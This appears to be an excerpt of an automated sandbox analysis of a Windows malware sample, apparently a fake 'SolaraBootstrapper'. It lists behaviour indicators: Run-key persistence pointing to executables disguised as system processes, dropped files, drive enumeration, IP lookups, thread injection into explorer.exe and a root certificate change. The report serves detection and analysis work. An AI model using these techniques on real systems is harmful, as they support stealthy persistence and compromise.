| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" | C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Offline Web Pages\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\All Users\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\winNet\\lsm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\winNet\\spoolsv.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\winNet\\Idle.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default User\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\sv-SE\cmd.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Windows\SysWOW64\sv-SE\ebf1f9fa8afd6d | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | \??\c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\m6dw6b.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2520 set thread context of 2388 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Common Files\Services\6203df4a6bafc7 | C:\winNet\wscript.exe.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | \??\c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\088424020bedd6 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Defender\es-ES\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\Updater6\smss.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\Updater6\69ddcba757bf72 | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\5940a34987c991 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Journal\fr-FR\conhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\dwm.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\DESIGNER\b75386f1303e64 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | \??\c:\Program Files\Windows Journal\fr-FR\conhost.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\088424020bedd6 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\42af1c969fbb7b | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File opened for modification | C:\Program Files\Windows Portable Devices\dwm.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\6cb0b6c459d5d3 | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files\Common Files\Services\lsass.exe | C:\winNet\wscript.exe.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\c5b4cb5e9653cc | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Journal\fr-FR\088424020bedd6 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Defender\es-ES\cmd.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Offline Web Pages\Refcrt.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI58FF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI59BC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | \??\c:\Windows\Downloaded Program Files\explorer.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Prefetch\ReadyBoot\7a0fd90576e088 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Offline Web Pages\a0b1fd4c5438e9 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\de-DE\WmiPrvSE.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Installer\f7753ea.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7753ea.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Downloaded Program Files\explorer.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Offline Web Pages\886983d96e3d3e | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\xdwd.dll | C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe | N/A |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\133006b48fb54b | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\de-DE\24dbde2999530e | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI59AC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Downloaded Program Files\7a0fd90576e088 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Offline Web Pages\csrss.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | \??\c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\Offline Web Pages\Refcrt.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Windows\diagnostics\system\DeviceCenter\es-ES\Refcrt.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Prefetch\ReadyBoot\explorer.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
